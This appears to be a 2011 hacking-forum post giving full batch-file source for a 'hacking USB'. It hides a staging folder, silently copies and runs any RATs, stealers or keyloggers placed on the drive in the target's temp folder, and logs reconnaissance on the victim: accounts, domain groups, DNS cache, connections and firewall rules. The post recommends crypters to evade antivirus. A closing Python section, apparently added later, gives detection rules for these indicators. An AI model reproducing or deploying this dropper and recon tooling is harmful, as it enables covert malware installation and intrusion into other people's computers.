Making an Ultimate Hacking USB with Only .BAT Files
2011 August 19, 9:39 AM
I have seen many different attempts at creating a USB hacking tool. The Switchblade and Hacksaw were okay, but they would set off many alarms, making them useless, so I propose something different.

This uses three simple batch files: Go.bat, injector.bat, and sysinfo.bat. Save all three of these files to the root of any USB drive, then run go.bat; it will create a hidden directory on your USB drive called Recycler. Note: after the first run the folders and go.bat will be hidden system files, and injector.bat and sysinfo.bat will move into another folder; they will no longer be in the root. In this folder there are three subfolders: System (scripts will install here), Docs (logs go here) and BIN (put any executable here, .exe, .bat, or .vbs, and it will copy it to the target computer and execute it).

The concept here is that there are no better tools for USB hacking than RATs, stealers, keyloggers, downloaders, AV killers, etc., that can be found on this site and made FUD with the available crypters here. The reason for the copy and execute is that if you use an encryption algorithm like Blowfish, for example, the execution time can be minutes or at least a long time, longer than you probably want to stick around. I have copied and executed 15 files at once, like I-stealer, Cybergate, etc., and it takes about 10-15 seconds. While this is occurring, a second script is using Windows tools to gather some quick intel like external IP, history, network statistics, ports utilized, etc. I run this on a machine with KIS 2011 on it and no alarms occur, if your files are FUD.

So here goes, thanks to Pithbot and Forum_Reader for their assistance. Save all three files to the root of the USB drive and run go.bat. When complete, your USB eject menu will come up; after that, add some files to the BIN folder and see what this will do.
::__Go.bat__:: Code: @(echo off & break off & Title _) >nul If %~d0 == %systemdrive% goto :EOF ::First Run Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System" If exist %wrkdir% CD %wrkdir% >nul & Goto Next If not exist %wrkdir% mkdir %wrkdir% >nul Attrib +s +h Recycler /d /s :Next if exist injector.bat copy /y injector.bat %wrkdir% >nul && del /f /q %~d0\injector.bat >nul if exist sysinfo.bat copy /y sysinfo.bat %wrkdir% >nul && del /f /q %~d0\sysinfo.bat >nul if exist inject.vbs del /f /q %~d0\inject.vbs >nul if exist sysinfo.vbs del /f /q %~d0\sysinfo.vbs >nul CD %wrkdir%>nul If exist inject.vbs Start "" inject.vbs>nul & Goto Next1 If exist injector.bat Start "" injector.bat >nul :Next1 If exist sysinfo.vbs Start "" sysinfo.vbs >nul & Goto Next2 Call sysinfo.bat :Next2 attrib +s +h %0 cls exit ::__Injector.bat__:: Code: @(echo off & break off & Title _) >nul ::-------------------------------------- ::This is called the Injector :: This script is meant to only run from flash drive :: On first run, it makes the %wrkdir% on your flashdrive as a place to hide files :: I used recycler\S-15~ ect to make it look not obvious as a hidden system folder :: Any executable files place in the "Bin" folder will be copied to %temp% and executed, exe, bat, and vbs :: It have put 10-15 files in there at once and it copies and executes them all in about 10 seconds ::Very handy if you have things that inject into memory, that will otherwise cause virtual memory errors if they are executed from USB. 
::It's nice because you don't need to know filenames and edit script all of the time it executes everything ::If you make your scripts self destruct that would be good if they only need to run once :: I have another script that logs pc, system and network, open ports, history, info etc, using only windows tools :: It gets called by another script along with this one, and saves to "\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs" ::When this script is complete it brings up the safely remove hardware menu to signify completion for drive ejection. ::----------------------------------------- @echo off & @break off & title _ if not [%1]==[] goto :%1 call %0 system exit :system if exist inject.vbs start "" "inject.vbs" echo set o = createobject("wscript.shell") > inject.vbs echo o.run "%~0 script", vbhide, true >> inject.vbs start "" "inject.vbs" exit :script If %~d0 == %systemdrive% goto :EOF Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\BIN" If exist %wrkdir% CD %wrkdir% >nul & Goto Next If not exist %wrkdir% mkdir %wrkdir% >nul Attrib +s +h Recycler /d /s Goto :EOF :Next ::Non obvious directory creation on PC If not exist "%temp%\MessengerCache" mkdir "%temp%\MessengerCache" >nul :ExeCheck If exist "*exe" copy /y "*.exe" "%temp%\MessengerCache" & Goto EXEGooD :BatCheck If exist "*bat" copy /y "*bat" "%temp%\MessengerCache" & Goto BatGood :VbsCheck If exist "*vbs" copy /y "*vbs" "%temp%\MessengerCache" & Goto VbsGood Goto :eof :EXEGooD For %%j IN ("%temp%\MessengerCache\*.Exe") DO Start "" %%j Goto BatCheck :BatGood For %%h IN ("%temp%\MessengerCache\*.Bat") DO Start "" %%h Goto VbsCheck :VbsGood For %%i IN ("%temp%\MessengerCache\*.Vbs") DO Start "" %%i Del /F /Q inject.vbs >nul @cls & @Exit ::__Sysinfo.bat__:: Code:@echo off & @break off & title _ call %0 system exit :system if exist sysinfo.vbs start "" "sysinfo.vbs" echo set o = createobject("wscript.shell") > sysinfo.vbs echo o.run "%~0 script", vbhide, true >> sysinfo.vbs 
start "" "sysinfo.vbs" exit :script Set wrkdir="\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\Docs" If exist %wrkdir% CD %wrkdir% >nul & Goto Next If not exist %wrkdir% mkdir %wrkdir% >nul Attrib +s +h Recycler /d /s && Attrib +s +h Recycler\*.txt :Next CD %wrkdir%>nul set logfile=%wrkdir%\%computername%-%random%.txt 2>&1 ::@@System_Info and Log Creation@@:: Echo ************************************ >> %logfile% Echo ***********[System Info]************ >> %logfile% Echo ************************************ >> %logfile% Echo. >> %logfile% Echo Computer Name is: %computername% and the Logged on User Name Is: %username% The date and Time is: %date% %time% >> %logfile% time /t >> %logfile% date /t >> %logfile% Echo *********************************************** >> %logfile% Echo ***********[External / Internal Ip]************ >> %logfile% Echo *********************************************** >> %logfile% ::This script for external ip was not written by me, got it from spam:: echo Function MyIP_XMLHTTP( )>wan.vbs echo Dim objRequest, strURL >>wan.vbs echo MyIP_XMLHTTP = "0.0.0.0" >>wan.vbs echo strURL = "http://www.whatismyip.com/automation/n09230945.asp" >>wan.vbs echo Set objRequest = CreateObject( "Microsoft.XMLHTTP" ) >>wan.vbs echo objRequest.open "GET", strURL, False >>wan.vbs echo objRequest.send vbNull >>wan.vbs echo If objRequest.status = 200 Then MyIP_XMLHTTP = objRequest.responseText >>wan.vbs echo Set objRequest = Nothing >>wan.vbs echo End Function >>wan.vbs echo ret = MyIP_XMLHTTP( ) >>wan.vbs echo Set FSys = CreateObject("Scripting.FileSystemObject") >>wan.vbs echo Set MonFic = FSys.CreateTextFile("00001.tmp") >>wan.vbs echo With MonFic >>wan.vbs echo .writeLine ret >>wan.vbs echo End With >>wan.vbs call wan.vbs ::--------------------- for /F "tokens=* delims=" %%a in (00001.tmp) do set wanIP=%%a del /F /Q wan.vbs >NUL del /F /Q 00001.tmp >NUL ::--------------------- ipconfig |find "IPv4" > 00002.tmp for /f "tokens=2 delims=:" %%a in 
(00002.tmp) do set lanIP=%%a del /F /Q 00002.tmp >NUL ::--------------------- for /F "tokens=* delims=" %%i in ('reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\MUI\UILanguages"') do set lang=%%i set lang=%lang:~68,5% ::--------------------- cls echo. >> %logfile% echo ^>^>^> Local IP:%lanIP% >> %logfile% echo ^>^>^> Internet IP: %wanIP% >> %logfile% echo ^>^>^> Localisation: %lang% >> %logfile% Echo. >> %logfile% Echo ************************************ >> %logfile% echo ***********[Network Info]*********** >> %logfile% Echo ************************************ >> %logfile% Echo. >> %logfile% ::Network Info net user /domain >> %logfile% net group /domain >> %logfile% net localgroup /domain >> %logfile% net localgroup administrators /domain >> %logfile% net localgroup "Account Operators" /domain >> %logfile% net accounts /domain >> %logfile% net view /domain >> %logfile% net view >> %logfile% Echo ************************************ >> %logfile% echo ***********[Local Info]************* >> %logfile% Echo ************************************ >> %logfile% Echo. >> %logfile% ::Local Info ipconfig /all >> %logfile% ipconfig /displaydns >> %logfile% netstat -ano >> %logfile% netstat >> %logfile% arp -a >> %logfile% tasklist /svc >> %logfile% tasklist >> %logfile% tasklist /v >> %logfile% net share >> %logfile% net use >> %logfile% net accounts >> %logfile% net localgroup >> %logfile% net localgroup administrators >> %logfile% systeminfo >> %logfile% netsh firewall show config >> %logfile% netsh advfirewall show allprofiles >> %logfile% netsh advfirewall firewall show rule name=all >> %logfile% netsh diag show all /v >> %logfile% netsh diag /v >> %logfile% ping localhost >> %logfile% echo Completed Data Recovery on %time% %date% >> %logfile% ::@@Eject Drive to Signify Completion@@:: setlocal enableextensions rundll32.exe shell32.dll,Control_RunDLL hotplug.dll endlocal :END ::Cleanup ping localhost -n 1>nul Del /F /Q sysinfo.vbs >nul @cls @exit | |
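The three scripts above leave distinctive process-creation traces: the Recycler\S-1-5-21-... staging path on a removable drive, execution out of %temp%\MessengerCache, wscript running inject.vbs or sysinfo.vbs, a burst of built-in enumeration commands, and the hotplug dialog at the end. The following detection sketch is an added example, not part of the original post; the event field names (`time`, `host`, `cmdline`), the sample events and the burst thresholds are assumptions.

```python
import re

# Indicators taken from the scripts on this page; thresholds are assumptions.
PATH_RULES = {
    "recycler_staging": re.compile(r"\\Recycler\\S-1-5-21-[\d-]+\\(System|BIN|Docs)", re.I),
    "messengercache_exec": re.compile(r"\\Temp\\MessengerCache\\[^\\]+\.(exe|bat|vbs)", re.I),
    "hidden_vbs_launcher": re.compile(r"wscript(\.exe)?\b.*\b(inject|sysinfo)\.vbs", re.I),
    "hotplug_dialog": re.compile(r"rundll32(\.exe)?\s+shell32\.dll,Control_RunDLL\s+hotplug\.dll", re.I),
}
RECON = [re.compile(p, re.I) for p in (
    r"\bnet\s+(user|group|localgroup|accounts|view)\b", r"\bnetstat\b", r"\barp\s+-a\b",
    r"\btasklist\b", r"\bsysteminfo\b", r"\bipconfig\s+/(all|displaydns)\b",
    r"\bnetsh\s+(adv)?firewall\b")]
RECON_MIN, RECON_WINDOW = 5, 120  # distinct recon tools within N seconds (assumed)

def detect(events):
    """Return {host: set(rule names)} for process-creation events."""
    hits, recon = {}, {}
    for ev in sorted(events, key=lambda e: e["time"]):
        host, cmd = ev["host"], ev["cmdline"]
        for name, rx in PATH_RULES.items():
            if rx.search(cmd):
                hits.setdefault(host, set()).add(name)
        for idx, rx in enumerate(RECON):
            if rx.search(cmd):
                seen = recon.setdefault(host, {})
                seen[idx] = ev["time"]  # last time this recon tool ran on the host
                recent = [t for t in seen.values() if ev["time"] - t <= RECON_WINDOW]
                if len(recent) >= RECON_MIN:
                    hits.setdefault(host, set()).add("recon_burst")
    return hits

SAMPLE = [  # constructed events (Sysmon Event ID 1 style); time is in seconds
    {"time": 0, "host": "WS01", "cmdline": r'wscript.exe "E:\Recycler\S-1-5-21-1844237615-1757981266-1417001333-1003\System\inject.vbs"'},
    {"time": 3, "host": "WS01", "cmdline": r"C:\Users\bob\AppData\Local\Temp\MessengerCache\tool.exe"},
    {"time": 5, "host": "WS01", "cmdline": "net user /domain"},
    {"time": 6, "host": "WS01", "cmdline": "ipconfig /displaydns"},
    {"time": 7, "host": "WS01", "cmdline": "netstat -ano"},
    {"time": 8, "host": "WS01", "cmdline": "tasklist /svc"},
    {"time": 9, "host": "WS01", "cmdline": "systeminfo"},
    {"time": 40, "host": "WS01", "cmdline": "rundll32.exe shell32.dll,Control_RunDLL hotplug.dll"},
    {"time": 10, "host": "WS02", "cmdline": "ipconfig /all"},
    {"time": 900, "host": "WS02", "cmdline": "systeminfo"},
]

if __name__ == "__main__":
    for host, rules in detect(SAMPLE).items():
        print(host, sorted(rules))
```

The `hotplug_dialog` rule also fires when a user opens Safely Remove Hardware, so treat it as supporting evidence only when it appears alongside the other rules on the same host.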